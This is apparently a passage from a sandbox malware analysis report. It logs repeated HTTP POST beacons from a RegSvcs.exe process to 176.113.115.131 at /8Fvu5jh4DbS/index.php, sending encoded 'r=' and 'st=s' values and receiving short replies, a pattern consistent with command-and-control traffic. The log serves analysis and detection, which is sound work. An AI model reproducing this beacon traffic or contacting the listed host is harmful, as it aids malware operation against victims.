Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:46.302700996 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 20 | Source: 192.168.2.4:55812 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:47.936800957 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:48.624346018 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 21 | Source: 192.168.2.4:55813 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:50.140458107 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:50.835179090 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 22 | Source: 192.168.2.4:55814 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:52.466824055 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:53.154411077 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 23 | Source: 192.168.2.4:55815 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:54.669842958 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:42:55.380978107 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 24 | Source: 192.168.2.4:55822 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:57.173350096 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:42:57.863358021 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:42:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 25 | Source: 192.168.2.4:55838 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:42:59.404030085 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:43:00.109401941 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID: 26 | Source: 192.168.2.4:55854 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:43:01.734025002 CET | 160 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Jan 8, 2025 08:43:02.419342995 CET | 197 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID: 27 | Source: 192.168.2.4:55869 | Destination: 176.113.115.131:80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jan 8, 2025 08:43:03.935311079 CET | 312 bytes | OUT
POST /8Fvu5jh4DbS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.131
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B

Jan 8, 2025 08:43:04.628889084 CET | 196 bytes | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 Jan 2025 07:43:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                    Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 55885 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:06.265182018 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:06.970510960 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 55897 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:08.483939886 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:09.181086063 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 55913 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:10.812190056 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:11.501291037 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 55929 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:13.018024921 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:13.708719969 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 55945 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:15.343653917 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:16.047466993 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 55961 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:17.566282988 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:18.273776054 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 55976 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:19.907335043 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:20.603780031 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 55988 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:22.124735117 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:22.831617117 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 56004 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:24.470468044 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:25.156790018 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 56020 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:26.673631907 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:27.388703108 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 56036 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:29.020411015 CET | Bytes transferred: 160 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Timestamp: Jan 8, 2025 08:43:29.707614899 CET | Bytes transferred: 197 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session ID: 39 | Source IP: 192.168.2.4 | Source Port: 56051 | Destination IP: 176.113.115.131 | Destination Port: 80 | PID: 1436 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    Timestamp: Jan 8, 2025 08:43:31.220406055 CET | Bytes transferred: 312 | Direction: OUT | Data: POST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Timestamp: Jan 8, 2025 08:43:31.919856071 CET | Bytes transferred: 196 | Direction: IN | Data: HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:43:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


